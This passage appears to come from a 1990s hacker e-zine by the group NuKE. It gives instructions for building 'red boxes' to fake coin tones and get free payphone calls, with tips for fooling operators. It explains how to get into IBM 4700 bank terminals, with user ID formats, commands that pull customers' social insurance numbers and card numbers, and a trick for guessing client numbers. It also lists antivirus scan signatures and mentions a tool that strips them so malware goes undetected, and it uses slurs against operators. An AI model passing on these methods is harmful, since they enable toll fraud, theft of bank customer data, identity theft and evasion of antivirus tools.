oscillator circuit. MUTE OUT (pin 10) This is a CMOS output which sinks current to Vss when no tones are being generated and sources current from Vdd when tones are being generated. TONE OUT (pin 16): This output is the open emitter of an NPN transistor. The other pin (collector) is connected with the Vdd. Well, this is the exact pin description according to the abilities and limitations of this IC. Now this Integrated Circuit (IC) was designed to be powered by the telephone line and a battery to keep the memory intact. Well, due to the fact that we are powering this circuit by battery you can feed both Vm and Vss to the same negative supply, the battery, of course. Now the MUTE OUT pin is perhaps also bothering you; well, this circuit was designed to drive a simple interface circuit to mute the receiver when any key is depressed. Again this is NOT needed as you will be connecting your DTMF generator to a small speaker rather than putting it directly into the line, as this circuit was designed for that, so all that MUTE does is when you start depressing keys it mutes of the receiver so that it will not interfere with other incoming sounds misstated as DTMF tones. However you can avoid adding a speaker by un-screwing the mouth piece and feed the TONE-OUT and Vdd supply directly into the conventional payphones, however this may attract unwanted glances, so you'll be better off with a speaker. The next part is about the key-pad, perhaps complex if you plan to design your own. Frankly, I found that time consuming; you can buy key-pads in several electronics stores, as Radio Shack, but I did find it in a local electronics store. Then again, if you have an old phone I guess you can take it from there. Now I must warn you there are TWO types of key-pads that are widely used, and both will work on this circuit, but you need to know which one you have in order to make corrections. The key-pad found in most telephones are what we call STANDARD KEYPADs. This has to do on the way the switch is connected inside. │ Simply, when a key is depressed, it closes the ──────┬┼───Row switch but also comes in contact with the │┘│ negative power supply. Thus we call this method ──┤ │ NEGATIVE-COMMON or/and standard key-pad. Vss│─┤ Col │ As you can see, this method consists of the row ├──┐ and column coming to contact (a closing of a │  switch). This type of keypad we call ───────┼──■─Row SINGLE-CONTACT key-pad. │ Col If you plan to build your key-pad certainly the single key-pad is the way to go, it's a lot simpler. So if your using a standard key-pad remember to connect the negative supply to the key-pad! All that's left now is to connect the key-pad to the circuit, very easy and fast; you just connect Col 1 to Col 1, Row 1 to Row 1, etc... You may notice that this is a military-style key-pad, as it includes the A, B, C, D keys which you don't find in your everyday phone key-pads. You really don't need them, so if you don't have them don't alarm yourself, just don't connect them! However you will need TWO extra keys, one for STORE command and the other for the REDIAL, so either add an extra key or switch or whatever you wish and connect it, like so. ┌────────────────────────────Col 1 │ ┌──────────────────────Col 2 │ │ ┌────────────────Col 3 │ │ │ ┌─────────Col 4 ┌──┴──┬──┴──┬──┴───┬──┴──┐ │ 1 │ 2 │ 3 │ A ├──────Row 1 ├─────┼─────┼──────┼─────┤ │ 4 │ 5 │ 6 │ B ├──────Row 2 ├─────┼─────┼──────┼─────┤ │ 7 │ 8 │ 9 │ C ├──────Row 3 ├─────┼─────┼──────┼─────┤ │ * │ 0 │ # │ D ├──────Row 4 ├─────┼─────┼──────┼─────┤ │Store│ │Redial│ ├──────Row 5 └─────┴─────┴──────┴─────┘ Ahh, congrads, your DTMF Generator is now completed! If you were like myself and added an extra switch to go from white box to red box mode, GREAT! The only difference is that a white box needs the 3.57545 Mhz crystal and the red box needs the corresponding crystal, so simply put a switch and move from mode to mode. Now for the red box to work we need five 3900 hertz at 33 milliseconds apart and 33 milliseconds long, so you'll need to save your key five times in memory and then simply put the box to the mouthpiece end of the payphone and press the memory key, you have just enter $0.25 into the payphone. NOTE: I only have this working with the 6.5536 Mhz crystal. I cannot say that the timing interval will be exact with the other crystals; chances are that taking a crystal of 7.XXXXXX or 5.XXXXXX Mhz is simply too far from the 700 + 2200 hertz tone. Try to get the closest value to 6.50 Mhz. I didn't include the way to save the red box tone into the memory, as you get a nice little paper when you buy the IC, but in case you don't you first power up the unit, press "*" (or your valid red box tone key) five times and then you press STORE and a number in which to store it in. And to dial the stored key, press REDIAL and the number in which you stored the red box tone! Remember the NEW crystal should be installed at ALL times to generate the RED BOX tone! If you save the tone with your 6.XXXX Mhz intact and redial it with the 3.57545 Mhz it will not work! Lastly, I recommend an "A-Cut Crystal (NTSC TV color-burst)" for both the 3.57545 and your red box crystal. Try local components stores. You should find the crystal, or else look around, ask around; I did leave you with a few references near here where I got most of my stuff so you can try them out if you can't find them on your own. REFERENCE Addison Ltd/Ltee 8018 20th Avenue Montreal, Canada, H1Z-3S7 tel: 1-514-376-1740 Active Electronic Components 6080 Metropolitan East Montreal, Canada, H1S-1A9 tel: 1-514-256-7538 1-800-363-7601 (Outside Quebec) Hamilton Avnet International Canada 2570 Sabourin St., St-Laurent Montreal, Canada, H4S-1M2 tel: 1-514-331-6443 1-800-361-7129 (Outside Quebec) National Semiconductors Corporation 2900 Semiconductuctor Drive Santa Clara, California 95051, USA ALSO: Try out Motorola and RCA dealers. They carry lots of crystals that go into TV decoders/scramblers, so there's a very good chance they should have it. The crystals don't cost more than $1.00, kaypads can be bought for $0.75, PCBoard under $1.00, the IC goes for $2.00. The project should cost under $5 if you can find the supplies in local stores -- if I did in lonely Canada then you should have no trouble! If they don't have it, ask them to order it, if they ask "why?" tell them it's for a TV component, as TVs and related works like decoders and scramblers use NTSC TV color-burst crystals! NOTE: For the next InfoJournal I should have a DTMF Generator for "Caller IDs" (yep, you can send your own DTMF Caller ID tones), and how the number/name is received. So call up your local BBS with Caller ID and make it display 666-6666 and logon as your favourite Death-Angel character name. Those interested in the actual project can contact myself anytime soon, of course you have must have a grasp of electronics! Rock Steady/NuKE =========================================================================== =========================================================================== The IBM 4700 Unix Based Systems - PART I ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ For those advanced hackers and perhaps "crazy" ones, the IBM 4700s are a new light. These systems are generally one of the hottest systems one can ever access. Theses systems are usually used in banks, and they are quite WIDELY used in Canada and the USA. I cannot speak for other parts of the world as I haven't been able to locate any of these huge systems yet! In this article I will show you a quick intro on the "user-friendly" 4700s. I have also obtained REAL sample captures in order to document this article better. This article is only being released on the "free informational" consideration, and is solely for informational purposes. Any attempt to carry this to a further degree can lead to serious penalization by the law. Anyhow lets begin. Ever wonder what type of systems banks must use, when you set inside for a darn withdrawal or deposit of your money? The banks do contain somewhat disturbing information about yourself and do also sell this information to others for great deals of money. Credit Bureaus are perhaps the best organization to work with the bankers to provide almost all the credibility a person may hold. One can easily notice if a bank uses the nominal IBM 4700s by a fast look around inside the bank. Go in for a transaction and look over the cashier and see if you spot any terminals. These terminals are simply just a monitor and a keyboard, and the name "IBM" is usually plastered all over the monitor, so you can at least know its an IBM Network. Many models have been introduced, each have an added feature as the model number increases. Today the IBM 4700s are largely used. All the systems in all the same banks are hooked into one vast system located perhaps in the central bank head-officesa, and each individual bank will be hooked into this system during the work hours. I don't know what system this 4700s hook up to, their speed seems like a very old Vax system, however I do not know so I can not say exactly. My experience is only with the station terminals (IBM 4700s). The IBM 4700s nominally USED 1200/NONE Baud modems. These are perhaps due to the fact that this system originated in the 1979-80 period. However today many of these IBM 4700s are adding a 9600 baud modem. Starting in 1988 IBM has developed a 9600 baud modem for these IBM 4700s systems, as it provides a faster access time and a new security feature. Theses modems are known as IBM 9600 Modems Model 7861-015, these modems have CUT possible break-ins by at least 90%. For the first time these modems were equipped with a Data Encryption Standard (DES), during the 1988-89 period IBM marketed these 9600 Modems at a startling $2,000 a pop to all of the bank systems using IBMs. However, before the 9600 modems, it is only fair to state that the software was equipped with DES that would encrypt/decrypt information as it pass through the server in/out the modem. The great improvement was that the 9600 Modems had DES build into the hardware, and it would encrypt/decrypt at a much faster rate compared to the older 1200. Nevertheless expect to encounter DES Encryption. DES contains a 56-bit key, if the key can be broken you have just accessed the largest system a person can enter, thus generating the saying "Hacker's Heaven." You must read the "Data Encryption Standard (DES)" article published in this InfoJournal by myself to understand that DES is POSSIBLE to break. Compared to Lucifer, DES is a lot easier, and remote access to a bank system is very possible. Nevertheless, local access can be gained by accessing the terminal itself within the network. I will brief you on the functions and the work abouts of this IBM 4700s system. One can easily know if they contain access to a IBM 4700s by its logon feature, which follows the bellow... ------------------------------------ IDENTICATION MODE ADMIN./MODE (4700) CODE DE L'USAGER / USER ID : MOT DE PASSE / PASSWORD: ------------------------------------ Okay, the "---" lines simple means that whatever is in between is the exact input/output this systems gives you once connected. Now the user ID must follow a certain pattern as that's how accounts are used in this system. The USER ID goes like so: XXX XXXXX │││ └────────> 5 digit number identifying the bank branch. ││└───────────> User Letter. If the bank allows five people to access ││ this system each will have a letter from A to E ││ representing user #1 as A, #2 as B etc... │└────────────> Access level: 1=Bank Manager (can do ALL). │ 2=Bank Director (limited, can view │ all but cannot make changes many │ changes, like cancel a loan). │ 4=Even less access where you cannot │ view all, and are restricted in │ changes. │ 6=View only what #4 can. No │ changing possible. └───> Language use: X=English T=French An example ID would be "T6A10281" whereby 10281 in the branch bank number, A is the first account in that bank, and 6 is the level of the code and T is the language to use (French). Once inside the system you will receive an ":" as a prompt. No help is given, but I did manage to find a few codes for you. Basically if one wishes to pull out a user account we can do so with the "CLTIDT6*" command! CLTIDT6* -> "*" Functions as an Enter key! ││││││└──> The access level (View). A 4 would allow access to ├┘│├┘│ make changes to the info displayed! │ ││ └───> Separator │ │└─────> "ID" = "IDentification requested" │ └──────> Separator └────────> "CL" = "CLient Info" So we can guess this will pull out the Client's ID! Doing an CLTIDT6* we will get a screen like so: ------------------------------------------------------- :CLTIDT6* :::::::: ENREGISTREMENT CLIENT PARTICULIER :::::::: NO CLIENT : NOM : PRENOM : N.A.S : DATE NAISSANCE: EMPLOYEUR : TEL : ------------------------------------------------------- Unfortunately, this was a French account, so all the captures I have are in French. Here's a quick lesson: NOM --> name; PRENOM --> given name; N.A.S --> Social Insurance Number (SIN); DATE NAISSANCE --> date of birth. The rest is simple. To search for a person you must try to fill in AS MUCH as possible to search for an account! The more INFO you got the better it is. Once you entered enough data you get two screens that are as follows. Since this is French, I added the English translation inside the inside the parenthesis. ------------------------------------------------------- NO CLIENT : (Client number) TRANSIT: (5-digit bank #) NO CARTE CLIENT: (Client info number) DEPUIS : (Client since) NOM : (Real last name) PRENOM : (Given name) SEXE : (Sex) ADRESSE NO: (Address #) RUE : (Street) APP.: VILLE : (City) PROVINCE : PAYS : (Country) CODE POSTAL :(Postal/ZIP code) A/S : LANGUE :(Language) TEL. : N.A.S : (SIN) DATE NAISSANCE: (Birth) NO PERMIS COND.: : -------------------------------------------------------- Pressing Enter will give you the next and final screen: -------------------------------------------------------- NO CLIENT : ACTUEL PRECEDENT EMPLOYEUR : (Current employer) (Last employer) POSTE OCCUPE: (Job title) DATE DEBUT : (Since) DEBUT:(Since) FIN:(Until) CODE: TYPE: TYPE : TELEPHONE : MASTER CARD : (M/C card number) VISA : (Visa card number) CARTE CLIENT: (Automatic bank card number) NO COMPTE : (Account numbers [and balance if access >= 4]) : : : : -------------------------------------------------------- Con't in Part #2 The IBM 4700s Unix Base Systems - PART II ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Everyone can now understand exactly how powerful a 4700s System really is. But perhaps the mind boggling truth is that this information can be easily tapped into illegally, and such information can cause great havoc. Perhaps the most mind boggling feature that I have seem to found interesting is the search/profile of a client. In this section you can search a client in the bank with only needing VERY LITTLE information. There are six nominal ways to search for the clients profile and the are by: 1. The Client Number (Format: XXXXX#########) The "X" represent letters and the "#" represent numbers. In order to get the Client Number you could have written it from getting it in the first part! But the first part demands lots of information of a person, in order to get it. With this all you need is the person's last name, first letter of the given name and date of birth. Eg: John Smith -- Date of Birth 75-04-21 Client Number = SMITJ249578001 The way we got the number part is like so: take the date of birth and subtract by 99-99-99. So 75-04-21 = (9-7)(9-5) - (9-0)(9-4) - (9-2)(9-1). The last three digits are just in case there are people with the same names and date of birth, kind of rare, 001 is usually ok, but try 002 if another guy exists. 2. Client Enterprise Number (Business Client Number) Same as above but for companies. 3. Valid Account Number 4. Valid Account Number of a Term-Deposits 5. Automatic Teller Cards 6. Credit Card (M/C or VISA) One boggling fact is this one: when you go to an Automatic Teller Machine, check the garbage. You will see that some people will throw away their slips once they read the balance of the account. One DRAWBACK is that on the slip you will see your Automatic Teller Card Number written on top! This is particulary true for Canada's largest banks like Royal Bank, National Bank and TD Banks that nominally use IBM 4700s! All one must do is easily take your slip and ALL they need on you can be found in the 4700s systems, and slowly you find yourself in financial trouble. Sometimes "free information" such as these articles are written for your protection. The world is truely ruled by little bits of 1s and 0s, and turning on the right bits can give you access to virtually anything. The code to access this search/profile is with the "CLTPR6*" command. Which will give you: ------------------------------------------------------- :CLTPR6* 1. NO DE CLIENT PARTICULIER : (Client #) 2. NO DE CLIENT ENTREPRISE : (Client # comp.) 3. NO COMPTE BANCAIRE : (Bank account #) 4. NO COMPTE PLACEMENT : (Term-Lock account) 5. NO COMPTE CARTE CLIENT : XXXXXX- (Teller card number) 6. NO COMPTE MASTERCARD : XXXX- (M/C card number) -------------------------------------------------------- The "Xs" are for SET numbers, depending what Bank system you enter the M/C and Teller Card always begin with the same first few digits. For Manhattan Bank M/C begin with 5424... Of course if you enter a Royal Bank the terminal will read VISA card number rather than M/C as Royal offers the VISA card. A search with this will get the two screens from the last part. There is also ways to find out loan information, or how many term-deposit one has at whatever interest rate. With the right access codes like a T2 or a T1 you can access or void any of these accounts. HOWEVER: as easy as this sounds, it is quite difficult, then again not difficult enough! Even if you wish to close your account in any bank your Information does NOT become erased, as I demonstrated this to Pure Energy who closed his accounts several years ago, though the information I got was quite old, as his address was invalid. Nevertheless I did get his date of birth, SIN and other information that can be used to access other systems in other banks to gain faster access to his accounts. Again this seems quite easy, I warn you not to try it, it will get you penalized by the lawman. Anytime you try to change accounts or access too much information the system creates a log, and alerts the administrators. All the access commands I was able to find out is on the bottom: -Identification of a client CLTIDT6 * -Profil of a Client CLTPRO6 * -List of active and closed loans CTTACT6 / # Client Number -List of account numbers of a client CLTDPT6 / # Client Number -List of Term Deposits of a Client DPTCDC6 / # Client Number I hope you found this information useful for your own protection. Remember don't leave any slips from automatic tellers, and never say your account number to a cashier, write it down and show it to them. A lot can be done to ruin you financially with the info these system contain. And last but not least I am not responsible for any attempts that you try to illegally access these systems, I know IBM will be GLAD to help you in sending you information of these system, of course you will have to "pretend" your part of a big corporation looking into their network! Rock Steady/NuKE =========================================================================== =========================================================================== A Beginner's Guide to Red Boxing ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ About six months ago I made my first red box, and let me tell you, this is the way to go. With the ever-increasing dangers of phreaking, red boxing provides a safe, effective alternative that is easily available to those with little technical knowledge and allows calls anywhere in the world with only a small investment. Before I elaborate on how to construct your red box (unlike Rock Steady, I took the easy way out and used the now-famous Radio-Shack conversion) and list some of the "tricks of the trade," let's list the pros and cons of red boxing compared to other forms of phreaking. Pros ~~~~ * UNTRACEABLE! Fuck ESS, nothing can find you with a red box! You're just an average joe using a pay phone. Even if they do catch on, you can just hang up and try again... Just don't abuse the same pay phone for hundreds of dollars a month and everything's cool. * Small, easy-to-carry unit is portable, durable, and looks like a legitimate pocket dialer... * Perfect line quality. No static, no loss of volume, etc. unlike PBXs, extenders, and other commonly-abused phone systems. * Low cost...thirty dollars gets you unlimited free calls (I estimate I've "spent" over $500 so far). The only upkeep cost is new batteries every few months. There's not even any cost at all for each call you make, not even local charges, as with PBXs (if applicable in your area). Cons ~~~~ * Simply put, it's a hassle. You have to drag yourself out to a pay phone to use it. You have to keep pressing the button periodically to add more "money." Such is the price for free calls, I suppose... * Because you're using a pay phone, calls are voice-only. Not only are accoustic couplers slow and laptop use unusual (ahem), but pay phones make a click every minute, plus you constantly get a synthesized voice or operator demanding more money every so often. * Sometimes you can get a suspicious operator... Your average operator is of limited intellegence (hell, I've even told an AT&T operator what I'm doing, and she still didn't get it [Me: "Hi, I'd like to red box a call to Paris." Bitch: "You'll be paying with quarters?" Me: "No, I'm red boxing it. It's a device for commiting toll fraud." Bitch: "Sorry sir, I'm not familiar with that calling plan. Do you want to pay with your calling card?" Sheesh!]. Then again, five out of five randomly-sampled AT&T operators didn't know what 2600 Hz is, but that's another story...) Still, it's a chance. I've gotten a few suspicious operators who hassle you and return your "money" and ask you to reinsert it, and even one who knew what I was doing ("Ok sir, none of your quarters have registered. I'm afraid I'm going to have to report that pay phone. You aren't using quarters, the tones are coming from a small black box." I just denied it and she reconnected me, but I kept *that* call short. Sorry Lone Wolf.) I've even once gotten an intellegent local operator (gasp!) ("Okay, please insert a quarter now... I'm sorry sir, that did not sound like the quarter tone. Do you want to try inserting a real coin?") You can always hang up and hope you get a less intellegent one, but it's a pain in the ass. * At least in my area, local calls cannot be boxed directly...you have to either go through an operator or use an Equal Access override code (see below). Another hassle. * To my knowledge, this only works on the North-American phone system... Tough luck for all you foreigners :-). * Doesn't work on COCOTs, only pay phones owned by the local telco. Notes from Nowhere Man ~~~~~~~~~~~~~~~~~~~~~~ All of the above may not apply in your area; it all depends on how your local telco runs things. Specifically, in some areas you *may* be able to directly box local calls. Certain phones don't seem to allow the tones to get through. So far, I've only found three such phones, two at one location (a gas station). Hopefully this is just a fluke and not some kind of trend... Also, don't think that you can get money by using your box and asking the operator for your money back. It won't work. You see, the actual coins that you've deposited are returned to you, and since you've put nothing in, you get nothing out. I'd also like to add that contrary to what it says in some text files, it is not necessary to deposit a nickle before making a call. Supposedly the phone company performs a "ground test" when you make a call, so something has to be in the coin shute for the call to go through. This may or may not be true, but I've never deposited a coin before boxing a call and I've never had any problems directly due to this (I've gotten a few suspicious operators, but they've always relented after I "re-deposit" my "quarter" which didn't seem to register. Of course, the international operators at AT&T are much better informed...) Building Your Red Box ~~~~~~~~~~~~~~~~~~~~~ There are only two real components for a red box, at least using the "standard" method. The easiest part to get (but the more expensive one) is a Radio Shack "Thirty-Three Number Memory Pocket Tone Dialer," catalog number 43-141 (just ask the guy for "a tone dialer that can store numbers" to play dumb). At last check these are US$24.95 each (and they're kept behind the counter, so thieving is basically out unless you have inside connections). Be sure to get the one with memory features; the one with no memory is useless. The second thing you'll need is a 6.5536 MHz crystal. These can be obtained from your local electronics store (they're hard to find though, I know Radio Shack doesn't carry them) or from a mail order electronics distributor. (One frequently mentioned is Fry's Electronics in San Francisco, which sells these crystals for $0.89/each. They can be reached at 415-770-3763. I did not get my crystal from Fry's, so I cannot vouch for them.) In most cases the crystals cost between $.25 and $1.00 each, plus postage, if applicable. Oh yeah, you'll also need three AAA batteries. You can just pick these up at the local convenience store or buy them at Radio Shack when you buy the tone dialer. (Note: There is a rumor that Radio Shack is no longer offering the tone-dialer with memory. The stores in my area still have them in stock, but in some places they're supposedly unavailable. Get 'em while you can.) The only tools you'll need to make the red box are a small phillips screwdriver and a soldering iron (and solder). A pair of tweezers may also be useful. You'll want to work in a well-lit place, naturally, with good ventilation (solder gives off horrid fumes). First, unscrew the screws on the back of the tone dialer's case (there are some in the battery compartment, too). Carefully pry open the case; you'll need to apply more force than you would think, but be careful not to break it or lose the switches, which can fall out when the case is opened. Next, solder out the 3.579 MHz crystal, which looks like a small silver cylinder toward the bottom-right of the board. Remove the crystal and save it. In it's place, solder in your 6.5536 MHz crystal, being careful not to let the two leads touch one another, or to drip solder across the two leads. Because the new crystal is much larger than the old one, you may have to *CAREFULLY* bend a few other crystals to make room for it. Put the cover back on, and rescrew the case. Finally, pop in the three AAA batteries the dialer requires. You're now ready to program your box. Programming Your Red Box ~~~~~~~~~~~~~~~~~~~~~~~~ Ok, you've just replaced the crystal in your pocket dialer. Now what do you do? It's pretty easy. Switch the Store/Dial switch to "Store" and turn the unit on. The red LED in the upper-left should go on (if it doesn't, you screwed up; open it up and try again). Now press the "Mem" button (left-most button on the bottom row) and then hit the star key ("*") five (5) times. Then press Mem again and press a "Priority" button (one of the top three buttons); I like to use P3 for this. The unit should beep, letting you know that the number was stored. This button is now the "quarter" key. Next, press the Mem button, press P3 (or whatever button you used for the quarter key), Pause (the middle button on the bottom row), P3, etc. (As an alternative to the Pause button, I have been informed that you can use the pound key instead, making your dialing much quicker. I wouldn't use this on a live operator, though... After experimenting with this method, I've found that it tends to bring a live operator on the line very often.) You want to store four "quarters" and five pauses total, a pause between each "quarter." Then hit Mem again, then P2 (or whatever key you want to use for the $1.00 key), and wait for the beep. Flip your unit off, then switch the Store/Dial switch to Dial. Your red box is now ready. Why Does This Work? ~~~~~~~~~~~~~~~~~~~ You may be asking yourself "how in the world can this work?!" Basically, the red box works on the principle that when you put money into a pay phone tones are generated to indicate to the CO that you've dropped in a coin; the red box simulates these tones, allowing you to make calls for free. When you replace the factory-installed 3.579 MHz crystal with the 6.5536 MHz one, you are altering the DTMF tones upward so that the star key now happens to be the same pitch as a coin tone (1700 Hz + 2200 Hz). When you store the five tones, nothing particular happens; but it so happens that Radio Shack pocket dialers replay those stored tones at the precise rate that a pay phone expects for a quarter (five thirty-three millisecond beeps with a thirty-three millisecond pause between each of the bleeps). (It is possible to simulate nickle and dime sounds, too, but the timings are different, and would require much more work for something that's really useless. Why use small coins when you can just use quarters?) Please note that because of the tone shift caused by the crystal, the touch-tone keys will no longer work right...your box is no longer a pocket dialer. For those interested in keeping the dialing feature, try building the COMBO box (red/white box), as detailed in text files and 2600 Magazine, Autumn 1992 issue. For more information on red box theory, and for plans on how to build a "true" red box (this requires much more time, effort, and skill, and gives no benefit), check out other files on red boxes (RED.BOX, etc.). Also refer to Rock Steady's excellent article on red boxing in this issue. Rock Steady takes the "electronics" approach; being a novice at electronics I elected to take the easy way and just modify the tone dialer. (Remembering what it's like to have no idea what the fuck you're doing, I wrote this file as explicitly as possible. Forgive me if it seems *too* detailed for you.) Placing Calls ~~~~~~~~~~~~~ To place a call with a red box, put the speaker on the tone dialer firm against the mouthpiece of the pay phone, making sure the black rubber ring on the back of the dialer fits snuggly against the mouthpiece, turn it on (you can verify that it's on by the LED in the upper-left), and press the priority (P) buttons as needed to generate quarter sounds. Details are given for the three types of phone calls: intra-LATA, inter-LATA, and international. Intra-LATA (local) ~~~~~~~~~~~~~~~~~~ If you're in the same boat I am, you may not be able to box local calls. If this is the case, just dial the operator and explain to her how you need to place call to wherever. Usually she'll just ask for your quarter, but sometimes she'll ask why you don't do it yourself; in this case, you can either feign ignorance ("Ah, iz zhat so? I ahm zorry, I ahm visiting from Germany unt zhere ve have to make khalz through zee operator. Can you dial it for me?") or feed her some story how the phone keeps swallowing your quarters or not recognizing them or something. When she asks for the quarter (or possibly more), give it to her...just press the "quarter" key however many times is needed, leaving a slight pause between each one to avoid suspicion (after all, no human can drop in a quarter per second). "Thank you, please hold. CLICK. RING..." The better, faster alternative, is to go through AT&T using an Equal Access override code. Simply dial 10288+1-NPA-NXX-XXXX (basically, you're using AT&T to place a call which would normally be placed via your local phone company). Treat this just like an inter-LATA call (see below). Note that this will only work with AT&T (10288), as only AT&T is equiped to place long-distance calls from a pay phone. (As a side note, AT&T charges you about $2.10 or so for a call which would normally cost only $0.25. Kinda' funny... Of course, with a red box, this doesn't matter.) Unfortunately, some pay phones block Equal Access codes; if this is the case, just go through the local operator (after all, the local telco has exclusive rights to intra-LATA calls). If you can box local calls, just deposit the virtual quarters after you dial the number, just like an inter-LATA call (see below). Inter-LATA (long-distance) ~~~~~~~~~~~~~~~~~~~~~~~~~~ Dial up the number, then wait for the ACTS voice or AT&T operator. "Please deposit two dollars and fifty-five cents for the first three minutes." Do as it says...hit the "one-dollar" key twice and then the "quarter" key three times (or whatever combination is required for your call). (When you get really fast, you'll find it faster to just use the "quarter" key exclusively.) "Thank you for using AT&T. You have twenty cents credit toward overtime..." That's all there is to it. If you do get an operator, keep cool, just keep putting in money but use the "quarter" key only, as some operators will get suspicious when you drop in $1.00 in quarters at perfectly regular intervals. They almost always leave you alone. Every so-many minutes (usually three or five) a computer voice or a live operator will ask for more money. Give it to her as outlined above. Sometimes after you hang up an operator will call the phone back immediately, demanding some money for overtime. You can either give it to her (with your box, of course), or "give it to her." It's fun to chew out the Bell bitch when she can't do a thing about it...they just have to write off the loss. (They threaten to bill the called party sometimes, but they can't legally do this; it's just an intimidation tactic.) International ~~~~~~~~~~~~~ Dial 011, then the country code, then the area code, and finally the local number; press the pound key ("#") to signal the end of the number. Wait for the AT&T operator to come on (notice that all long-distance and international calls that are paid for with coins [as opposed to calling cards] are only handled by AT&T...really fair). Ask her to put your call through (she may verify the number), and yes, you are paying with coins. She'll say something like "Ok, your call will cost $6.50 [this is for Melbourne, Australia], but I can only take $3.00 at a time. Please insert the first three dollars now..." Be sure to use only the "quarter" key with live operators, as many international operators have recently been alerted to red boxing. They are catching on, so be careful not to arouse their suspicion. When you "pay" three dollars (heheh) she'll say something like, "Ok, please wait," then you'll hear the connection going through and the "foreign" ringing. When someone answers she'll say something like "This is United States calling, please hold for an international call." If no one's home, you'll get your money back. Too bad none comes out... The person is then muted out, then she asks for the rest of the money. Give it to her. "Thank you, go ahead..." Every so-many minutes (usually one or two) a live operator will ask for more money. Give it to her as outlined above. (Note: regardless of what they may say, the operator tends to hang out on the line and listen in on you. Do not tell the person how you're calling, as I'm sure that's how they once caught on. I'd also suggest keeping the conversation legal.) Sometimes after you hang up an operator will call the phone back immediately, demanding some money, just as with a long-distance call. See above for more details. Where Should I Call From? ~~~~~~~~~~~~~~~~~~~~~~~~~ To be brief, you can use your red box from any true pay phone (red boxes do not work on COCOTs [privately-owned pay phones]). Notice I say "can" and not "should;" some phones are definitely better than others. I've found that the best places to make calls from are government-owned buildings. Why? These are public places, there are always real pay phones there, and they are indoors, where it's warm in the winter and cool in the summer. The best phones are isolated and have a place for you to sit while you talk. I suggest you box from libraries, schools, municipal buildings, etc., but in my opinion, high schools are best. Why? They're open late for sports, etc. most days, even weekends, and you can blend in very easily (if you're a teenager, you're a student; if you're older, your an older brother visting your old school; if you look old enough, you're a parent). Just go after school hours or it'll be noisy... Everyone has a favorite place, just look around and find yours. Will I Be Caught? ~~~~~~~~~~~~~~~~~ The following is an approximation of chances of being caught while using a red box (and dealing with a live operator). You can assume that you will never be caught when dealing with an electronic "operator" (ACTS). Again, these are only appoximations based on my experience. Remember, though, even if you are caught, nothing will happen to you; just hang up and try again. If they threaten to call the police or anything, just take off, don't take any chances. Range % Detected ~~~~~ ~~~~~~~~~~ Local 5% or less Long-distance 25% or less International 75% or less Closing ~~~~~~~ I've found red boxing to be a great form of phreaking. There's no risk of being caught and you can call anywhere in the world for free -- all it takes is a $30 investment and the willingness to put up with the hassles. Plus, you get the added bonus of being able to laugh to yourself next time you see some chump actually putting real money in a pay phone (gasp!). Time to give credit where credit is due: I'd like to thank The Baron and Guido Sanchez for introducing me to red boxing, and GarbageHeap for telling me some of the tricks of the trade (come back to Chicago soon!). Also, some of the information in the Autumn 1992 issue of 2600 magazine and in various text files (e.g. RED.BOX, etc.) has proved useful to me, and was referenced in this article. To everyone, your help is much appreciated. Well folks, get going, and have fun with your new toy! Nowhere Man/NuKE =========================================================================== =========================================================================== SCAN v100 Virus Signitures ~~~~~~~~~~~~~~~~~~~~~~~~~~ The following is a list of all scan strings extracted from McAfee's Scan v100. Note: No self-mutating virus signitures can be automatically extracted from SCAN due to problems with wildcard searches. If you need the signiture for a mutating virus not found on the list, please contact: Screaming Radish@111:950/75 via 111:950/3. [Note from Rock Steady: We have also included a file called MCAFEE.STR is the product of Screaming Radish from Australia , that removes Scan strings from any version of the AV program SCAN by McAfee. We have a similar method for F-Prot, and F-Prot's VIRSTOP, which will be included in the next InfoJournal. Check it out -- are you surprised how dumb this programs is? Remember the first MtE scare? SCAN used *VIRUS STRINGS* on it! HAHAHA...dummies! And they claimed a 99.9999% hit rate...bite me.] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Scan ID Virus Name Hex Signature ~~~~~~~~~ ~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [WinVir] WinVir fc061e07be6e01bf8101 [Cf] Coffee Shop e03d0a03726cb8da33cd2180fca5 [Otto] Otto 01a2ff0056b9600281c6 [J4J] Jump4Joy b8c7078bd889c1053936cd21 [I9] Ice 9 bf100303feb099b971008a25 [Tab] Tabulero 1e6a0003c32ea311002ea16c00 [Tab] Tabulero 8c06cf00be9c0033c08ed8bf8f43 [Roc] Rocko 8a865d02b93a022e30460045e2f9c3 [344] 344 8b9655028d9e2901b977003117 [Blj] Bljec 8bc82d0001a3fa00030e [Grnt] Grunt 8b9657028d9e3001b9740031 [Cf1] Coffee Shop 1 836f12728e47120e1fb92006f3 [K4] KODE4 013b45017402ebef83c703 [OW] 384 be7002bf4b02b92500fcacaae2fc [1014] 1014 83fbf07503e98b00b000 [104] 104 81c7030126803d06740a [3Sht] Triple Shot bef11ab9e70cfdf3a5fc [439] 439 8a84b301a20201e83d017413 [595] 595 fe873e008a973d0080fa01 [Abrx] Abraxas 81ed060181fc4144740b [Acd] Acid bb32018a273226060190882743 [Agn] Agena 832e0200518b1e02002bdd [Cpt] Capital 81eb0c018db71f01b98803 [Cybr] Cyber 8985a904a192002e8985ab04 [Cerb] Cerburus b86035cd21fc8bfb8d369502 [Chad] Chad 01240a3c0a7526b80300 [Coa] Coahuila 81ed30018db6f102bf0001b90300 [GTk] Telekom 8a9c2f058dbc2001b90f04 [R715] Rebo-715 bd04018b6e0081c5060183ed40 [Qo] Quake-o 81ed07018db61e01b9d4012e8134 [Les] Les 83ee038cc00510002e03 [Hi] Hi 83ed0633c08ed8813e6401 [Fune] Fune 83c6e9b90600fcf3a5ffe2 [Eof] End-of b80f03b104d3e8bbff0f03d839 [Fam] Fam fd0875f1f6de80e60132ed [IOU] IOU 019c0eb80335cd21891e8601 [IT] IT 899ef8028c86fa02b41a8d96fc02 [Jeru] Jeru 8b1e010181c3030183eb708b872300 [J26] July 26 090189160b0152b41abae8fd [P5220] Pas-5220 8b3e6a008a85200030e431d2 [Ngs] Nygus 8c9cfe028ed8b04e38068803 [S3d] Silver 3d b8931b50e8300259ff36c420 [PI] PI a11f013d0202740b8cc82d10 [NPX] NPox 2.0 